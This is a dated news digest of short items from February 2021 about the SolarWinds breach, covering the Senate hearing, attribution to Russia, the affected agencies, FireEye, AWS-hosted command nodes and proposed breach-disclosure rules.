_______________________________________________________________________________________

(February 24, 2021)


Important takeaways from the US Senate's hearing of SolarWinds breach

The Senate Intelligence Committee held its first public hearing on the SolarWinds hack, and there are five key takeaways: fingers pointed to Russia as the hack's perpetrator, and companies want the US to hold Russia accountable. Amazon was a no-show despite being invited, and lawmakers weren't happy about it. Lawmakers and tech leaders agreed that there should be more robust information-sharing around cyber threats. A new law setting standards for breached companies could be on the horizon. In addition, the hearings showed cooperation between the government and industry.


_______________________________________________________________________________________

(February 24, 2021)


SolarWinds hackers targeted NASA and Federal Aviation Administration networks

Hackers are said to have broken into the networks of U.S. space agency NASA and the Federal Aviation Administration as part of a wider espionage campaign targeting U.S. government agencies and private companies. The two agencies were named by the Washington Post, hours ahead of a Senate Intelligence Committee hearing tasked with investigating the widespread cyberattack.


_______________________________________________________________________________________

(February 24, 2021)


There is substantial evidence of Russian involvement in SolarWinds breach

Microsoft directly blamed Russia's foreign intelligence service for the devastating security breach of at least nine federal agencies and dozens of private businesses, going further than US government officials have to date in their public attribution for the hack. Microsoft President Brad Smith said it would likely take time for the US government to formally reach the same conclusion.

Ref - CNN

_______________________________________________________________________________________

(February 23, 2021)


SolarWinds attackers stayed for several months in FireEye's network

The attackers who infiltrated SolarWinds Orion's software build and updates had spent several months embedded in FireEye's network. "The attacker wasn't alive every single day on their network," Kevin Mandia, CEO of FireEye, told the US Senate Intelligence Committee in response to a question about the time frame of the attack on FireEye's network.


_______________________________________________________________________________________

(February 23, 2021)


Finding answers on the SolarWinds breach

Key senators and corporate executives warned at a hearing on the SolarWinds breach that the “scope and scale” of the recent hacking of government agencies and companies, described as the most sophisticated in history, were still unclear. The National Security Agency, despite spending billions of dollars planting sensors in networks around the world, missed the evidence for more than a year.


_______________________________________________________________________________________

(February 23, 2021)


AWS infrastructure was used in SolarWinds hack

Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given the public cloud giant’s infrastructure was used in the attack. Specifically, Amazon Web Services hosted most of the secondary command and control nodes in the SolarWinds attack.

Ref - CRN

_______________________________________________________________________________________

(February 23, 2021)


Mandatory breach disclosure in wake of SolarWinds breach

Lawmakers and witnesses at the Senate Intelligence Committee’s hearing on SolarWinds emphasized the possibility of legislation mandating that certain businesses disclose some breaches to the federal government. Currently, there is no rule requiring a company like FireEye to disclose a breach to the federal government, even when national security is a concern.

Ref - SCMagazine

_______________________________________________________________________________________

(February 23, 2021)


There could be more tech firms besides SolarWinds used to hack targets